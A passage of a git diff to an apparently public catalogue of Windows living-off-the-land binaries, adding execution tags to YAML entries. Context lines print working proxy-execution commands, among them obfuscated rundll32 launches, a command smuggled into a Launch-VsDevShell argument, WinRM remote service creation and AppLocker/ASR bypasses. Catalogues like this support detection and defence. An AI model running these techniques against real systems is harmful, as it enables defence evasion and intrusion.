    Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
    Usecase: Load an executable payload.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
-      - Input: INF
+      - Execute: INF
 Full_Path:
  - Path: c:\windows\system32\syssetup.dll
  - Path: c:\windows\syswow64\syssetup.dll
--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: HTA
  - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
    Usecase: Load an executable payload by calling a .url file with or without quotes.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: URL
  - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
    Description: Launch an executable by calling OpenURL.
    Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
    Description: Launch an executable by calling FileProtocolHandler.
    Usecase: Launch an executable.
@ -32,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
    Description: Launch an executable by calling FileProtocolHandler.
    Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
@ -39,6 +47,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
    Description: Launch a HTML application payload by calling FileProtocolHandler.
    Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
@ -46,6 +56,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: HTA
 Full_Path:
  - Path: c:\windows\system32\url.dll
  - Path: c:\windows\syswow64\url.dll
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
    Description: Launch an executable payload by calling RouteTheCall (obfuscated).
    Usecase: Launch an executable.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\zipfldr.dll
  - Path: c:\windows\syswow64\zipfldr.dll
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1216
    OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
 Code_Sample:
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10
    Tags:
      - Execute: PowerShell
 Full_Path:
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
  - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
--- a/yml/OSScripts/Launch-VsDevShell.yml
+++ b/yml/OSScripts/Launch-VsDevShell.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"'
    Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag.
    Usecase: Proxy execution
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
    Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
    Usecase: Proxy execution from script
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\manage-bde.wsf
 Code_Sample:
--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216.001
    OperatingSystem: Windows 10
    Tags:
      - Execute: SCT
 Full_Path:
  - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
  - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216.002
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: PowerShell
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
 Detection:
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1216
    OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
 Code_Sample:
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: Remote
  - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
    Usecase: Proxy execution
@ -18,6 +21,9 @@ Commands:
    Privileges: Admin
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: Remote
  - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
    Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
    Usecase: Execute arbitrary, unsigned code via XSL script
@ -25,6 +31,8 @@ Commands:
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: XSL
 Full_Path:
  - Path: C:\Windows\System32\winrm.vbs
  - Path: C:\Windows\SysWOW64\winrm.vbs
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: Pester.bat ;calc.exe
    Description: Execute code using Pester. Example here executes calc.exe
    Usecase: Proxy execution
@ -18,13 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
-  - Command: Pester.bat ;calc.exe
+    Tags:
-    Description: Execute code using Pester. Example here executes calc.exe
+      - Execute: EXE
    Usecase: Proxy execution
    Category: Execute
    Privileges: User
    MitreID: T1216
    OperatingSystem: Windows 10, Windows 11
 Full_Path:
  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\<version>\bin\Pester.bat
 Code_Sample:
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
  - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
    Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
    Usecase: Local execution of managed code to bypass AppLocker.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@ -18,6 +18,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: All Windows
    Tags:
      - Execute: CMD
  - Command: adplus.exe -c config-adplus.xml
    Description: Dump process memory using adplus config file (see Resources section for a sample file).
    Usecase: Run commands under a trusted Microsoft signed binary
@ -32,6 +34,9 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: All windows
    Tags:
      - Execute: CMD
      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: PowerShell
  - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
    Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
    Usecase: Execute a provided EXE
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
 Code_Sample:
--- a/yml/OtherMSBinaries/Appcert.yml
+++ b/yml/OtherMSBinaries/Appcert.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
  - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
    Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
    Usecase: Execute custom made MSI file with malicious code
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218.007
    OperatingSystem: Windows
    Tags:
      - Execute: MSI
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
  - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
    Tags:
      - Execute: CMD
  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
    Tags:
      - Execute: EXE
  - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
    Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@ -49,6 +49,7 @@ Commands:
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
      - Execute: Remote
  - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may not longer work due to patch.
@ -58,6 +59,7 @@ Commands:
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
      - Execute: Remote
 Full_Path:
  - Path: no default
 Detection:
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: Shellcode
  - Command: |
      cdb.exe -pd -pn <process_name>
      .shell <cmd>
@ -20,6 +22,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
  - Command: cdb.exe -c C:\debug-script.txt calc
    Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
    Usecase: Run commands under a trusted Microsoft signed binary
@ -27,6 +31,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@ -20,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1055
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
    Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
    Usecase: Execute DLL code
--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CSharp
 Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
  - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
 Code_Sample:
--- a/Show More
+++ b/Show More